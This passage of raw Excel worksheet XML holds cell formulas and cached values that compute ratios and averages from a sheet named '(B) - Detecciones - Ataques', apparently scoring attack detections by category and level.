        <f>IF('(B) - Detecciones - Ataques'!IP22&lt;&gt;0,'(B) - Detecciones - Ataques'!IP22*'(B) - Detecciones - Ataques'!IL22/('(B) - Detecciones - Ataques'!IL22+'(B) - Detecciones - Ataques'!IN22),0)</f>
        <v>0.0001522533496</v>
      </c>
      <c r="EM31" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP22&lt;&gt;0,'(B) - Detecciones - Ataques'!IP22*'(B) - Detecciones - Ataques'!IN22/('(B) - Detecciones - Ataques'!IL22+'(B) - Detecciones - Ataques'!IN22),0)</f>
        <v>0.9966047503</v>
      </c>
      <c r="EN31" s="626"/>
      <c r="EO31" s="626"/>
      <c r="EP31" s="744"/>
      <c r="EQ31" s="745"/>
      <c r="ER31" s="745"/>
      <c r="ES31" s="745"/>
      <c r="ET31" s="745"/>
      <c r="EU31" s="745"/>
      <c r="EV31" s="745"/>
      <c r="EW31" s="745"/>
      <c r="EX31" s="745"/>
      <c r="EY31" s="745"/>
      <c r="EZ31" s="379" t="s">
        <v>664</v>
      </c>
      <c r="FA31" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ31)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ31 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ31)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ31 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="FB31" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ31)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ31 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ31)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ31 &amp; "*"))</f>
        <v>0.625</v>
      </c>
      <c r="FC31" s="621"/>
    </row>
    <row r="32">
      <c r="DR32" s="722"/>
      <c r="DS32" s="722"/>
      <c r="DT32" s="722"/>
      <c r="DU32" s="722"/>
      <c r="DV32" s="722"/>
      <c r="DW32" s="722"/>
      <c r="EG32" s="336"/>
      <c r="EH32" s="336"/>
      <c r="EL32" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP23&lt;&gt;0,'(B) - Detecciones - Ataques'!IP23*'(B) - Detecciones - Ataques'!IL23/('(B) - Detecciones - Ataques'!IL23+'(B) - Detecciones - Ataques'!IN23),0)</f>
        <v>1</v>
      </c>
      <c r="EM32" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP23&lt;&gt;0,'(B) - Detecciones - Ataques'!IP23*'(B) - Detecciones - Ataques'!IN23/('(B) - Detecciones - Ataques'!IL23+'(B) - Detecciones - Ataques'!IN23),0)</f>
        <v>0</v>
      </c>
      <c r="EN32" s="626"/>
      <c r="EO32" s="626"/>
      <c r="EP32" s="744"/>
      <c r="EQ32" s="745"/>
      <c r="ER32" s="745"/>
      <c r="ES32" s="745"/>
      <c r="ET32" s="745"/>
      <c r="EU32" s="745"/>
      <c r="EV32" s="745"/>
      <c r="EW32" s="745"/>
      <c r="EX32" s="745"/>
      <c r="EY32" s="745"/>
      <c r="EZ32" s="379" t="s">
        <v>357</v>
      </c>
      <c r="FA32" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ32)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ32 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ32)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ32 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FB32" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ32)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ32 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ32)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ32 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FC32" s="621"/>
    </row>
    <row r="33">
      <c r="DD33" s="572" t="s">
        <v>2419</v>
      </c>
      <c r="DE33" s="221"/>
      <c r="DF33" s="222"/>
      <c r="DR33" s="722"/>
      <c r="DS33" s="722"/>
      <c r="DT33" s="722"/>
      <c r="DU33" s="722"/>
      <c r="DV33" s="722"/>
      <c r="DW33" s="722"/>
      <c r="EG33" s="20"/>
      <c r="EH33" s="20"/>
      <c r="EL33" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP24&lt;&gt;0,'(B) - Detecciones - Ataques'!IP24*'(B) - Detecciones - Ataques'!IL24/('(B) - Detecciones - Ataques'!IL24+'(B) - Detecciones - Ataques'!IN24),0)</f>
        <v>0</v>
      </c>
      <c r="EM33" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP24&lt;&gt;0,'(B) - Detecciones - Ataques'!IP24*'(B) - Detecciones - Ataques'!IN24/('(B) - Detecciones - Ataques'!IL24+'(B) - Detecciones - Ataques'!IN24),0)</f>
        <v>1</v>
      </c>
      <c r="EN33" s="626"/>
      <c r="EO33" s="626"/>
      <c r="EP33" s="744"/>
      <c r="EQ33" s="745"/>
      <c r="ER33" s="745"/>
      <c r="ES33" s="745"/>
      <c r="ET33" s="745"/>
      <c r="EU33" s="745"/>
      <c r="EV33" s="745"/>
      <c r="EW33" s="745"/>
      <c r="EX33" s="745"/>
      <c r="EY33" s="745"/>
      <c r="EZ33" s="379" t="s">
        <v>310</v>
      </c>
      <c r="FA33" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ33)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ33 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ33)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ33 &amp; "*"))</f>
        <v>0.5968052268</v>
      </c>
      <c r="FB33" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ33)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ33 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ33)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ33 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="FC33" s="621"/>
    </row>
    <row r="34">
      <c r="DD34" s="763" t="s">
        <v>2452</v>
      </c>
      <c r="DE34" s="764" t="s">
        <v>2477</v>
      </c>
      <c r="DF34" s="585">
        <f>E26</f>
        <v>0.5389983694</v>
      </c>
      <c r="DR34" s="722"/>
      <c r="DS34" s="722"/>
      <c r="DT34" s="722"/>
      <c r="DU34" s="722"/>
      <c r="DV34" s="722"/>
      <c r="DW34" s="722"/>
      <c r="EG34" s="20"/>
      <c r="EH34" s="20"/>
      <c r="EL34" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP25&lt;&gt;0,'(B) - Detecciones - Ataques'!IP25*'(B) - Detecciones - Ataques'!IL25/('(B) - Detecciones - Ataques'!IL25+'(B) - Detecciones - Ataques'!IN25),0)</f>
        <v>0</v>
      </c>
      <c r="EM34" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP25&lt;&gt;0,'(B) - Detecciones - Ataques'!IP25*'(B) - Detecciones - Ataques'!IN25/('(B) - Detecciones - Ataques'!IL25+'(B) - Detecciones - Ataques'!IN25),0)</f>
        <v>1</v>
      </c>
      <c r="EN34" s="626"/>
      <c r="EO34" s="626"/>
      <c r="EP34" s="744"/>
      <c r="EQ34" s="745"/>
      <c r="ER34" s="745"/>
      <c r="ES34" s="745"/>
      <c r="ET34" s="745"/>
      <c r="EU34" s="745"/>
      <c r="EV34" s="745"/>
      <c r="EW34" s="745"/>
      <c r="EX34" s="745"/>
      <c r="EY34" s="745"/>
      <c r="EZ34" s="379" t="s">
        <v>292</v>
      </c>
      <c r="FA34" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ34)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ34 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ34)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ34 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FB34" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ34)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ34 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ34)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ34 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC34" s="621"/>
      <c r="FQ34" s="69"/>
      <c r="FR34" s="69"/>
      <c r="FS34" s="69"/>
      <c r="FT34" s="69"/>
      <c r="FU34" s="69"/>
    </row>
    <row r="35">
      <c r="B35" s="42" t="s">
        <v>2682</v>
      </c>
      <c r="C35" s="69">
        <f>E26</f>
        <v>0.5389983694</v>
      </c>
      <c r="DD35" s="382" t="s">
        <v>2462</v>
      </c>
      <c r="DE35" s="767" t="s">
        <v>2478</v>
      </c>
      <c r="DF35" s="369">
        <f>1-AVERAGE(DG9:DG22)</f>
        <v>0.3294960948</v>
      </c>
      <c r="DR35" s="722"/>
      <c r="DS35" s="722"/>
      <c r="DT35" s="722"/>
      <c r="DU35" s="722"/>
      <c r="DV35" s="722"/>
      <c r="DW35" s="722"/>
      <c r="EG35" s="336"/>
      <c r="EH35" s="336"/>
      <c r="EL35" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP26&lt;&gt;0,'(B) - Detecciones - Ataques'!IP26*'(B) - Detecciones - Ataques'!IL26/('(B) - Detecciones - Ataques'!IL26+'(B) - Detecciones - Ataques'!IN26),0)</f>
        <v>0</v>
      </c>
      <c r="EM35" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP26&lt;&gt;0,'(B) - Detecciones - Ataques'!IP26*'(B) - Detecciones - Ataques'!IN26/('(B) - Detecciones - Ataques'!IL26+'(B) - Detecciones - Ataques'!IN26),0)</f>
        <v>0</v>
      </c>
      <c r="EN35" s="626"/>
      <c r="EO35" s="626"/>
      <c r="EP35" s="744"/>
      <c r="EQ35" s="745"/>
      <c r="ER35" s="745"/>
      <c r="ES35" s="745"/>
      <c r="ET35" s="745"/>
      <c r="EU35" s="745"/>
      <c r="EV35" s="745"/>
      <c r="EW35" s="745"/>
      <c r="EX35" s="745"/>
      <c r="EY35" s="745"/>
      <c r="EZ35" s="422" t="s">
        <v>558</v>
      </c>
      <c r="FA35" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ35)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ35 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ35)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ35 &amp; "*"))</f>
        <v>0.7727272727</v>
      </c>
      <c r="FB35" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ35)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ35 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ35)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ35 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC35" s="621"/>
      <c r="FM35" s="69"/>
      <c r="FN35" s="69"/>
      <c r="FO35" s="69"/>
      <c r="FQ35" s="69"/>
      <c r="FR35" s="69"/>
      <c r="FS35" s="69"/>
      <c r="FT35" s="69"/>
      <c r="FU35" s="69"/>
    </row>
    <row r="36">
      <c r="B36" s="42" t="s">
        <v>2718</v>
      </c>
      <c r="C36" s="69">
        <f>1-C35</f>
        <v>0.4610016306</v>
      </c>
      <c r="DD36" s="382" t="s">
        <v>2465</v>
      </c>
      <c r="DE36" s="383"/>
      <c r="DF36" s="385">
        <f>SQRT(DF34*(1-DF35))</f>
        <v>0.6011659601</v>
      </c>
      <c r="DR36" s="722"/>
      <c r="DS36" s="722"/>
      <c r="DT36" s="722"/>
      <c r="DU36" s="722"/>
      <c r="DV36" s="722"/>
      <c r="DW36" s="722"/>
      <c r="EG36" s="20"/>
      <c r="EH36" s="20"/>
      <c r="EL36" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP27&lt;&gt;0,'(B) - Detecciones - Ataques'!IP27*'(B) - Detecciones - Ataques'!IL27/('(B) - Detecciones - Ataques'!IL27+'(B) - Detecciones - Ataques'!IN27),0)</f>
        <v>0</v>
      </c>
      <c r="EM36" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP27&lt;&gt;0,'(B) - Detecciones - Ataques'!IP27*'(B) - Detecciones - Ataques'!IN27/('(B) - Detecciones - Ataques'!IL27+'(B) - Detecciones - Ataques'!IN27),0)</f>
        <v>0</v>
      </c>
      <c r="EN36" s="626"/>
      <c r="EO36" s="626"/>
      <c r="EP36" s="744"/>
      <c r="EQ36" s="745"/>
      <c r="ER36" s="745"/>
      <c r="ES36" s="745"/>
      <c r="ET36" s="745"/>
      <c r="EU36" s="745"/>
      <c r="EV36" s="745"/>
      <c r="EW36" s="745"/>
      <c r="EX36" s="745"/>
      <c r="EY36" s="745"/>
      <c r="FM36" s="69"/>
      <c r="FN36" s="69"/>
      <c r="FO36" s="69"/>
      <c r="FP36" s="69"/>
      <c r="FQ36" s="69"/>
      <c r="FR36" s="69"/>
      <c r="FS36" s="69"/>
      <c r="FT36" s="69"/>
      <c r="FU36" s="69"/>
    </row>
    <row r="37">
      <c r="DR37" s="722"/>
      <c r="DS37" s="722"/>
      <c r="DT37" s="722"/>
      <c r="DU37" s="722"/>
      <c r="DV37" s="722"/>
      <c r="DW37" s="722"/>
      <c r="EG37" s="336"/>
      <c r="EH37" s="336"/>
      <c r="EL37" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP28&lt;&gt;0,'(B) - Detecciones - Ataques'!IP28*'(B) - Detecciones - Ataques'!IL28/('(B) - Detecciones - Ataques'!IL28+'(B) - Detecciones - Ataques'!IN28),0)</f>
        <v>0.1</v>
      </c>
      <c r="EM37" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP28&lt;&gt;0,'(B) - Detecciones - Ataques'!IP28*'(B) - Detecciones - Ataques'!IN28/('(B) - Detecciones - Ataques'!IL28+'(B) - Detecciones - Ataques'!IN28),0)</f>
        <v>0.9</v>
      </c>
      <c r="EN37" s="626"/>
      <c r="EO37" s="626"/>
      <c r="EP37" s="744"/>
      <c r="EQ37" s="745"/>
      <c r="ER37" s="745"/>
      <c r="ES37" s="745"/>
      <c r="ET37" s="745"/>
      <c r="EU37" s="745"/>
      <c r="EV37" s="745"/>
      <c r="EW37" s="745"/>
      <c r="EX37" s="745"/>
      <c r="EY37" s="745"/>
    </row>
    <row r="38">
      <c r="DR38" s="722"/>
      <c r="DS38" s="722"/>
      <c r="DT38" s="722"/>
      <c r="DU38" s="722"/>
      <c r="DV38" s="722"/>
      <c r="DW38" s="722"/>
      <c r="EG38" s="336"/>
      <c r="EH38" s="336"/>
      <c r="EL38" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP29&lt;&gt;0,'(B) - Detecciones - Ataques'!IP29*'(B) - Detecciones - Ataques'!IL29/('(B) - Detecciones - Ataques'!IL29+'(B) - Detecciones - Ataques'!IN29),0)</f>
        <v>0</v>
      </c>
      <c r="EM38" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP29&lt;&gt;0,'(B) - Detecciones - Ataques'!IP29*'(B) - Detecciones - Ataques'!IN29/('(B) - Detecciones - Ataques'!IL29+'(B) - Detecciones - Ataques'!IN29),0)</f>
        <v>0</v>
      </c>
      <c r="EN38" s="626"/>
      <c r="EO38" s="626"/>
      <c r="EP38" s="744"/>
      <c r="EQ38" s="745"/>
      <c r="ER38" s="745"/>
      <c r="ES38" s="745"/>
      <c r="ET38" s="745"/>
      <c r="EU38" s="745"/>
      <c r="EV38" s="745"/>
      <c r="EW38" s="745"/>
      <c r="EX38" s="745"/>
      <c r="EY38" s="745"/>
      <c r="EZ38" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="FA38" s="12" t="s">
        <v>2684</v>
      </c>
      <c r="FB38" s="451" t="s">
        <v>2685</v>
      </c>
      <c r="FC38" s="12" t="s">
        <v>2686</v>
      </c>
      <c r="FD38" s="451" t="s">
        <v>2687</v>
      </c>
      <c r="FE38" s="20"/>
      <c r="FF38" s="20"/>
      <c r="FG38" s="20"/>
      <c r="FH38" s="20"/>
      <c r="FI38" s="20"/>
      <c r="FJ38" s="20"/>
      <c r="FK38" s="20"/>
      <c r="FL38" s="20"/>
      <c r="FM38" s="20"/>
      <c r="FN38" s="20"/>
      <c r="FO38" s="20"/>
      <c r="FP38" s="20"/>
      <c r="FQ38" s="20"/>
      <c r="FR38" s="20"/>
      <c r="FS38" s="20"/>
      <c r="FT38" s="20"/>
      <c r="FU38" s="20"/>
    </row>
    <row r="39">
      <c r="DJ39" s="488"/>
      <c r="DK39" s="693"/>
      <c r="DL39" s="693"/>
      <c r="DM39" s="693" t="s">
        <v>2688</v>
      </c>
      <c r="DN39" s="694" t="s">
        <v>2689</v>
      </c>
      <c r="EG39" s="336"/>
      <c r="EH39" s="336"/>
      <c r="EL39" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP30&lt;&gt;0,'(B) - Detecciones - Ataques'!IP30*'(B) - Detecciones - Ataques'!IL30/('(B) - Detecciones - Ataques'!IL30+'(B) - Detecciones - Ataques'!IN30),0)</f>
        <v>0</v>
      </c>
      <c r="EM39" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP30&lt;&gt;0,'(B) - Detecciones - Ataques'!IP30*'(B) - Detecciones - Ataques'!IN30/('(B) - Detecciones - Ataques'!IL30+'(B) - Detecciones - Ataques'!IN30),0)</f>
        <v>0</v>
      </c>
      <c r="EN39" s="626"/>
      <c r="EO39" s="626"/>
      <c r="EP39" s="744"/>
      <c r="EQ39" s="745"/>
      <c r="ER39" s="745"/>
      <c r="ES39" s="745"/>
      <c r="ET39" s="745"/>
      <c r="EU39" s="745"/>
      <c r="EV39" s="745"/>
      <c r="EW39" s="745"/>
      <c r="EX39" s="745"/>
      <c r="EY39" s="745"/>
      <c r="EZ39" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="FA39" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*"))</f>
        <v>0.6710071942</v>
      </c>
      <c r="FB39" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*"))</f>
        <v>0.8333333333</v>
      </c>
      <c r="FC39" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6052086331</v>
      </c>
      <c r="FD39" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
      <c r="FE39" s="621"/>
      <c r="FF39" s="621"/>
      <c r="FG39" s="621"/>
      <c r="FH39" s="621"/>
      <c r="FI39" s="621"/>
      <c r="FJ39" s="621"/>
      <c r="FK39" s="621"/>
      <c r="FL39" s="621"/>
      <c r="FM39" s="621"/>
      <c r="FN39" s="621"/>
      <c r="FO39" s="621"/>
      <c r="FP39" s="621"/>
      <c r="FQ39" s="621"/>
      <c r="FR39" s="621"/>
      <c r="FS39" s="621"/>
      <c r="FT39" s="621"/>
      <c r="FU39" s="621"/>
    </row>
    <row r="40">
      <c r="DC40" s="768" t="s">
        <v>2673</v>
      </c>
      <c r="DD40" s="289"/>
      <c r="DE40" s="289"/>
      <c r="DF40" s="290"/>
      <c r="DJ40" s="695" t="s">
        <v>63</v>
      </c>
      <c r="DK40" s="769"/>
      <c r="DL40" s="769"/>
      <c r="DM40" s="696">
        <f>DI23</f>
        <v>0.2745901639</v>
      </c>
      <c r="DN40" s="681">
        <f>DO23</f>
        <v>0.131147541</v>
      </c>
      <c r="EC40" s="336"/>
      <c r="ED40" s="336"/>
      <c r="EE40" s="336"/>
      <c r="EF40" s="336"/>
      <c r="EG40" s="336"/>
      <c r="EH40" s="336"/>
      <c r="EL40" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP31&lt;&gt;0,'(B) - Detecciones - Ataques'!IP31*'(B) - Detecciones - Ataques'!IL31/('(B) - Detecciones - Ataques'!IL31+'(B) - Detecciones - Ataques'!IN31),0)</f>
        <v>0</v>
      </c>
      <c r="EM40" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP31&lt;&gt;0,'(B) - Detecciones - Ataques'!IP31*'(B) - Detecciones - Ataques'!IN31/('(B) - Detecciones - Ataques'!IL31+'(B) - Detecciones - Ataques'!IN31),0)</f>
        <v>0</v>
      </c>
      <c r="EN40" s="626"/>
      <c r="EO40" s="626"/>
      <c r="EP40" s="744"/>
      <c r="EQ40" s="745"/>
      <c r="ER40" s="745"/>
      <c r="ES40" s="745"/>
      <c r="ET40" s="745"/>
      <c r="EU40" s="745"/>
      <c r="EV40" s="745"/>
      <c r="EW40" s="745"/>
      <c r="EX40" s="745"/>
      <c r="EY40" s="745"/>
      <c r="EZ40" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="FA40" s="621">
